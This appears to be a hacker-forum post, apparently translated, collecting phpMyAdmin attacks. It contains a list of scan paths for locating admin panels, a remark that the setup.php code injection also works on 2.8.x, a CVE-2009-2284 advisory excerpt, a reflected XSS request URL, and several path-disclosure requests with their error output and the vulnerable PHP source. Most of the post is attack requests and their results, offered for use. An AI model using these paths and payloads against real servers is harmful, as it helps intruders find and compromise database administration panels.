/phpMyAdmin-2.7.0-rc1/ /phpMyAdmin-2.7.0-pl1/ /phpMyAdmin-2.7.0-pl2/ /phpMyAdmin-2.8.0-beta1/ /phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/ /phpMyAdmin-2.8.0/ /phpMyAdmin-2.8.0.1/ /phpMyAdmin-2.8.0.2/ /phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/ /phpMyAdmin-2.8.1-rc1/ /sqlmanager/ /mysqlmanager/ /p/m/a/ /PMA2005/ /pma2005/
/phpmanager/ /php-myadmin/ /phpmy-admin/ /webadmin/ /sqlweb/ /websql/ /webdb/
Regarding the phpMyAdmin (/scripts/setup.php) PHP Code Injection vulnerability, I'll add that phpMyAdmin 2.8.x is also vulnerable. Tested on phpMyAdmin 2.8.0.3. The main thing is that write permissions are there (
libraries/config.default.php
PHP:
$cfg['ShowPhpInfo'] = false;
It all depends on the settings. By default it's off.
phpMyAdmin SQL bookmark HTML Injection Vulnerability
Code:
Bugtraq ID: 35543
Class: Input Validation Error
CVE: CVE-2009-2284
Remote: Yes
Local: No
Published: Jun 30 2009 12:00AM
Updated: Aug 21 2009 03:57PM
Credit: Sven Vetsch
Vulnerable:
RedHat Fedora 9 0
RedHat Fedora 11
RedHat Fedora 10
phpMyAdmin phpMyAdmin 3.1.1 1
phpMyAdmin phpMyAdmin 3.1.1 0
phpMyAdmin phpMyAdmin 3.1 0
phpMyAdmin phpMyAdmin 3.0.1
phpMyAdmin phpMyAdmin 3.0
phpMyAdmin phpMyAdmin 3.2.0-rc1
phpMyAdmin phpMyAdmin 3.1.3.2
phpMyAdmin phpMyAdmin 3.1.3.1
phpMyAdmin phpMyAdmin 3.0.1.1
MandrakeSoft Enterprise Server 5 x86_64
MandrakeSoft Enterprise Server 5
I couldn't find an exploit or a more specific description online. I dug around myself:
Code:
/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E
Path disclosure in phpMyAdmin 2.6.1
Code:
http://localhost/Tools/phpMyAdmin/server_variables.php?lang=ru-win1251&server=1&collation_connection='
Code:
Fatal error: Call to undefined function PMA_reloadNavigation() in Z:\home\localhost\www\Tools\phpmyadmin\header.inc.php on line 132
Vulnerable part:
PHP:
function PMA_reloadNavigation() {
    global $cfg;

    // Reloads the navigation frame via JavaScript if required
    if (isset($GLOBALS['reload']) && $GLOBALS['reload']) {
        echo "\n";
        $reload_url = './left.php?' . PMA_generate_common_url((isset($GLOBALS['db']) ? $GLOBALS['db'] : ''), '', '&');
        ?>
<script type="text/javascript" language="javascript1.2">
<!--
if (typeof(window.parent) != 'undefined' && typeof(window.parent.frames['nav']) != 'undefined') {
    window.parent.frames['nav'].goTo('<?php echo $reload_url; ?>&hash=' + <?php echo (($cfg['QueryFrame'] && $cfg['QueryFrameJS']) ? 'window.parent.frames[\'queryframe\'].document.hashform.hash.value' : "'" . md5($cfg['PmaAbsoluteUri']) . "'"); ?>);
}
//-->
</script>
        <?php
        unset($GLOBALS['reload']);
    }
}

UPD
Code:
http://localhost/Tools/phpMyAdmin/footer.inc.php
Code:
Notice: Undefined variable: cfg in Z:\home\localhost\www\Tools\phpmyadmin\footer.inc.php on line 17
Vulnerable code:
PHP:
<?php
/* $Id$ */
// vim: expandtab sw=4 ts=4 sts=4:
/**
 * WARNING: This script has to be included at the very end of your code because
 * it will stop the script execution!
 */
require_once('./libraries/relation.lib.php'); // for PMA_setHistory()

/**
 * Query window
 */
// If query window is wanted and open, update with latest selected db/table.
if ($cfg['QueryFrame'] && $cfg['QueryFrameJS']) {
?>

Code:
http://localhost/Tools/phpMyAdmin/mult_submits.inc.php
Code:
Fatal error: Call to undefined function PMA_DBI_select_db() in Z:\home\localhost\www\Tools\phpmyadmin\mult_submits.inc.php on line 385
Vulnerable code:
PHP:
        if ($run_parts) {
            $sql_query .= $a_query . ';' . "\n";
            if ($query_type != 'drop_db') {
                PMA_DBI_select_db($db);
            }
            $result = @PMA_DBI_query($a_query) or PMA_mysqlDie('', $a_query, FALSE, $err_url);
        } // end if
    } // end for

    if ($use_sql) {
        require('./sql.php');
    } elseif (!$run_parts) {
        PMA_DBI_select_db($db);
        $result = PMA_DBI_query($sql_query);
    }
}
?>
(C)Xcontrol212